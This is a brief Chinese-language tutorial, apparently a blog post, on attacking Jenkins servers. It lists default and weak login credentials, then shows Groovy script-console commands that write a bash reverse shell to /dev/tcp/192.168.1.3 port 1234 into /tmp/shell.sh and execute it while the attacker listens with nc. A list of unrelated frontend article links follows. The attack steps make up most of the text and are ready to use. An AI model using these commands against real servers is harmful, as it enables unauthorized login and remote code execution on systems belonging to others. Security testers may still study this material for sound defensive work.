web中间件漏洞-Jenkins漏洞-弱口令、反弹shell

web中间件漏洞-Jenkins漏洞-弱口令、反弹shell

Jenkins弱口令

默认用户一般为jenkins/jenkins

使用admin/admin123登陆成功

Jenkins反弹shell


格式为 println"命令".execute().text

在/tmp目录中生成shell.sh文件,并向其中写入反弹shell的语句

new File("/tmp/shell.sh").write('bash -i >& /dev/tcp/192.168.1.3/1234 0>&1'

println "ls-al/tmp/shell.sh".execute().text

攻击机nc监听1234端口,使用sh命令执行服务器上的脚本进行反弹shell,println"sh/tmp/shell.sh".execute().text

相关推荐
艾恩小灰灰12 分钟前
为何Web前端开发仍坚守 HTML 和 CSS,而不全然拥抱纯 JavaScript?
开发语言·前端·javascript·css·html·纯js
吃葡萄不吐葡萄皮嘻嘻26 分钟前
vue实现左右拖动分屏
前端·vue.js
GIS-CL31 分钟前
前端面试题2(vue3)
前端·vue.js
王天平·Jason Wong37 分钟前
汉王、绘王签字版调用封装
开发语言·前端·javascript
**之火1 小时前
ArrayBuffer 对象常见的几个用途
前端·javascript
GIS-CL1 小时前
前端面试题6(怎样打包封装自己的插件)
前端
东方佑1 小时前
使用tkinter 制作工作流ui
前端·windows·笔记·python·ui·分类
xiongxinyu101 小时前
让一个元素水平垂直居中的方式
前端·javascript·css·面试
eclipsercp1 小时前
《每天5分钟用Flask搭建一个管理系统》 第10章:前端集成
前端·python·flask
2301_791900851 小时前
HTML5与3D打印:探索网页内容的物理化可能
前端·3d·html5